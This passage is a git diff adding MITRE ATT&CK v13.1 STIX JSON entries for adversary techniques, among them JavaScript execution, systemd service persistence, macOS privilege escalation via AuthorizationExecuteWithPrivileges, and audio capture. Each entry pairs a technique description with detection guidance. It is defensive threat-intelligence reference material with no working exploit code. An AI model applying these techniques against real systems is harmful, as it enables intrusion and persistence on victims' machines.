}, + { + "source_name": "Symantec Windows Rootkits", + "description": "Symantec. (n.d.). Windows Rootkit Overview. Retrieved December 21, 2017.", + "url": "https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf" + }, + { + "source_name": "Wikipedia Rootkit", + "description": "Wikipedia. (2016, June 1). Rootkit. Retrieved June 2, 2016.", + "url": "https://en.wikipedia.org/wiki/Rootkit" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d.json new file mode 100644 index 0000000000000000000000000000000000000000..8f58900bb496cb0a077c493f658d4fa06f36246e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d.json @@ -0,0 +1,103 @@ +{ + "type": "bundle", + "id": "bundle--5edc4ff1-62ee-4a4f-b82c-195bd9aeeb1c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Cody Thomas, SpecterOps" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "type": "attack-pattern", + "created": "2020-06-23T19:12:24.924Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1059.007", + "url": "https://attack.mitre.org/techniques/T1059/007" + }, + { + "source_name": "NodeJS", + "url": "https://nodejs.org/", + "description": "OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020." + }, + { + "source_name": "JScrip May 2018", + "url": "https://docs.microsoft.com/windows/win32/com/translating-to-jscript", + "description": "Microsoft. (2018, May 31). Translating to JScript. Retrieved June 23, 2020." + }, + { + "source_name": "Microsoft JScript 2007", + "url": "https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript", + "description": "Microsoft. (2007, August 15). The World of JScript, JavaScript, ECMAScript \u2026. Retrieved June 23, 2020." + }, + { + "source_name": "Microsoft Windows Scripts", + "url": "https://docs.microsoft.com/scripting/winscript/windows-script-interfaces", + "description": "Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved June 23, 2020." + }, + { + "source_name": "Apple About Mac Scripting 2016", + "url": "https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html", + "description": "Apple. (2016, June 13). About Mac Scripting. Retrieved April 14, 2021." + }, + { + "source_name": "SpecterOps JXA 2020", + "url": "https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5", + "description": "Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14, 2021." + }, + { + "source_name": "SentinelOne macOS Red Team", + "url": "https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/", + "description": "Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple APIs Without Building Binaries. Retrieved July 17, 2020." + }, + { + "source_name": "Red Canary Silver Sparrow Feb2021", + "url": "https://redcanary.com/blog/clipping-silver-sparrows-wings/", + "description": "Tony Lambert. (2021, February 18). Clipping Silver Sparrow\u2019s wings: Outing macOS malware before it takes flight. Retrieved April 20, 2021." + }, + { + "source_name": "MDSec macOS JXA and VSCode", + "url": "https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/", + "description": "Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans with VSCode Extensions. Retrieved April 20, 2021." + } + ], + "modified": "2021-08-16T21:02:05.142Z", + "name": "JavaScript", + "description": "Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)\n\nJScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)\n\nJavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple\u2019s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple\u2019s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple\u2019s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility osascript, they can be compiled into applications or script files via osacompile, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)\n\nAdversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_detection": "Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.\n\nMonitor for execution of JXA through osascript and usage of OSAScript API that may be related to other suspicious behavior occurring on the system.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "2.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Module: Module Load", + "Script: Script Execution", + "Command: Command Execution", + "Process: Process Creation" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator", + "SYSTEM" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea.json new file mode 100644 index 0000000000000000000000000000000000000000..b805320ddd61bf69b045304793029894c8615e50 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea.json @@ -0,0 +1,63 @@ +{ + "type": "bundle", + "id": "bundle--fa5d9deb-b861-424b-a7b6-4c15f07ea7fe", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-21T14:32:48.393Z", + "name": "DNS", + "description": "Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target\u2019s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)\n\nAdversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)" + ], + "type": "attack-pattern", + "id": "attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea", + "created": "2020-10-02T15:47:10.102Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1590/002", + "external_id": "T1590.002" + }, + { + "source_name": "Circl Passive DNS", + "description": "CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020.", + "url": "https://www.circl.lu/services/passive-dns/" + }, + { + "source_name": "DNS Dumpster", + "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.", + "url": "https://dnsdumpster.com/" + }, + { + "source_name": "Sean Metcalf Twitter DNS Records", + "description": "Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved May 27, 2022.", + "url": "https://twitter.com/PyroTek3/status/1126487227712921600/photo/1" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0fff2797-19cb-41ea-a5f1-8a9303b8158e.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0fff2797-19cb-41ea-a5f1-8a9303b8158e.json new file mode 100644 index 0000000000000000000000000000000000000000..1de2ea998fe25beac2949880c00407cd012e599b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0fff2797-19cb-41ea-a5f1-8a9303b8158e.json @@ -0,0 +1,85 @@ +{ + "type": "bundle", + "id": "bundle--db1fba93-f4db-49fb-9428-56e709f8f72e", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Tony Lambert, Red Canary" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0fff2797-19cb-41ea-a5f1-8a9303b8158e", + "type": "attack-pattern", + "created": "2019-04-23T15:34:30.008Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1501", + "url": "https://attack.mitre.org/techniques/T1501" + }, + { + "source_name": "Linux man-pages: systemd January 2014", + "url": "http://man7.org/linux/man-pages/man1/systemd.1.html", + "description": "Linux man-pages. (2014, January). systemd(1) - Linux manual page. Retrieved April 23, 2019." + }, + { + "source_name": "Freedesktop.org Linux systemd 29SEP2018", + "url": "https://www.freedesktop.org/wiki/Software/systemd/", + "description": "Freedesktop.org. (2018, September 29). systemd System and Service Manager. Retrieved April 23, 2019." + }, + { + "source_name": "Anomali Rocke March 2019", + "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang", + "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019." + }, + { + "description": "Catalin Cimpanu. (2018, July 10). ~x file downloaded in public Arch package compromise. Retrieved April 23, 2019.", + "url": "https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a", + "source_name": "gist Arch package compromise 10JUL2018" + }, + { + "description": "Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux AUR Package Repository. Retrieved April 23, 2019.", + "url": "https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/", + "source_name": "Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018" + }, + { + "description": "Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved April 23, 2019.", + "url": "https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html", + "source_name": "acroread package compromised Arch Linux Mail 8JUL2018" + }, + { + "source_name": "Rapid7 Service Persistence 22JUNE2016", + "url": "https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence", + "description": "Rapid7. (2016, June 22). Service Persistence. Retrieved April 23, 2019." + } + ], + "modified": "2020-01-17T16:51:52.027Z", + "name": "Systemd Service", + "description": "Systemd services can be used to establish persistence on a Linux system. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.\n\nSystemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands. \n\n* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. \n* ExecReload directive covers when a service restarts. \n* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at recurring intervals, such as at system boot.(Citation: Anomali Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018)\n\nWhile adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_detection": "Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of \u2018systemd\u2019, a parent process ID of 1, and will usually execute as the \u2018root\u2019 user.\n\nSuspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: systemctl list-units -\u2013type=service \u2013all. Analyze the contents of .service files present on the file system and ensure that they refer to legitimate, expected executables.\n\nAuditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as /usr/sbin/service may reveal malicious systemd service execution.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_permissions_required": [ + "root", + "User" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--101c3a64-9ba5-46c9-b573-5c501053cbca.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--101c3a64-9ba5-46c9-b573-5c501053cbca.json new file mode 100644 index 0000000000000000000000000000000000000000..9bf2e8a041d3c4fc51995b67a69d7dbe21707303 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--101c3a64-9ba5-46c9-b573-5c501053cbca.json @@ -0,0 +1,74 @@ +{ + "type": "bundle", + "id": "bundle--d387b0f1-6662-4f6f-9d9a-e04ef33c2c48", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Erika Noerenberg, @gutterchurl, Carbon Black", + "Jimmy Astle, @AstleJimmy, Carbon Black" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--101c3a64-9ba5-46c9-b573-5c501053cbca", + "type": "attack-pattern", + "created": "2019-08-08T14:29:37.108Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1514", + "url": "https://attack.mitre.org/techniques/T1514" + }, + { + "source_name": "AppleDocs AuthorizationExecuteWithPrivileges", + "url": "https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg", + "description": "Apple. (n.d.). Apple Developer Documentation - AuthorizationExecuteWithPrivileges. Retrieved August 8, 2019." + }, + { + "source_name": "Death by 1000 installers; it's all broken!", + "url": "https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8", + "description": "Patrick Wardle. (2017). Death by 1000 installers; it's all broken!. Retrieved August 8, 2019." + }, + { + "source_name": "Carbon Black Shlayer Feb 2019", + "url": "https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/", + "description": "Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019." + }, + { + "source_name": "OSX Coldroot RAT", + "url": "https://objective-see.com/blog/blog_0x2A.html", + "description": "Patrick Wardle. (2018, February 17). Tearing Apart the Undetected (OSX)Coldroot RAT. Retrieved August 8, 2019." + } + ], + "modified": "2020-02-05T20:13:51.857Z", + "name": "Elevated Execution with Prompt", + "description": "Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.\n\nAdversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it's all broken!)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_detection": "Consider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "x_mitre_effective_permissions": [ + "root" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967.json new file mode 100644 index 0000000000000000000000000000000000000000..988c928f4e4f2f3edb91c2f2d069db02832b5fff --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--dd22565b-4e7f-40a2-bbe8-b826be44fbe7", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:36.503Z", + "name": "Audio Capture", + "description": "An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_detection": "Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.\n\nBehavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: OS API Execution" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "id": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "created": "2017-05-31T21:31:34.528Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1123", + "external_id": "T1123" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5.json new file mode 100644 index 0000000000000000000000000000000000000000..3a922220ebcdeb1e7f1436ca64df08f24da2efdd --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5.json @@ -0,0 +1,78 @@ +{ + "type": "bundle", + "id": "bundle--510ae511-d8fe-4e91-b7f2-471071442d5e", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "created": "2020-01-10T16:03:18.865Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1543", + "url": "https://attack.mitre.org/techniques/T1543" + }, + { + "source_name": "AppleDocs Launch Agent Daemons", + "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html", + "description": "Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017." + }, + { + "source_name": "TechNet Services", + "url": "https://technet.microsoft.com/en-us/library/cc772408.aspx", + "description": "Microsoft. (n.d.). Services. Retrieved June 7, 2016." + }, + { + "source_name": "OSX Malware Detection", + "url": "https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf", + "description": "Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.(Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. \n\nServices, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.(Citation: OSX Malware Detection) ", + "modified": "2022-04-20T16:52:58.415Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Create or Modify System Process", + "x_mitre_detection": "Monitor for changes to system processes that do not correlate with known software, patch cycles, etc., including by comparing results against a trusted system baseline. New, benign system processes may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. \n\nCommand-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. \n\nMonitor for changes to files associated with system-level processes.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_data_sources": [ + "Windows Registry: Windows Registry Key Modification", + "File: File Modification", + "Service: Service Creation", + "Windows Registry: Windows Registry Key Creation", + "Process: OS API Execution", + "Process: Process Creation", + "Driver: Driver Load", + "Command: Command Execution", + "File: File Creation", + "Service: Service Modification" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d.json new file mode 100644 index 0000000000000000000000000000000000000000..e0b9da18bd61f2ad1e8b1bc01105164335ca2302 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d.json @@ -0,0 +1,96 @@ +{ + "type": "bundle", + "id": "bundle--c7f9bd64-633a-4c05-ace9-dfc77c83c0ed", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:36.318Z", + "name": "External Remote Services", + "description": "Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)\n\nAccess to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.\n\nAccess may also be gained through an exposed service that doesn\u2019t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "ExtraHop", + "David Fiser, @anu4is, Trend Micro", + "Alfredo Oliveira, Trend Micro", + "Idan Frimark, Cisco", + "Rory McCune, Aqua Security", + "Yuval Avrahami, Palo Alto Networks", + "Jay Chen, Palo Alto Networks", + "Brad Geesaman, @bradgeesaman", + "Magno Logan, @magnologan, Trend Micro", + "Ariel Shuper, Cisco", + "Yossi Weizman, Azure Defender Research Team", + "Vishwas Manral, McAfee", + "Daniel Oakley", + "Travis Smith, Tripwire", + "David Tayouri" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Follow best practices for detecting adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours.\n\nWhen authentication is not required to access an exposed remote service, monitor for follow-on activities such as anomalous external use of 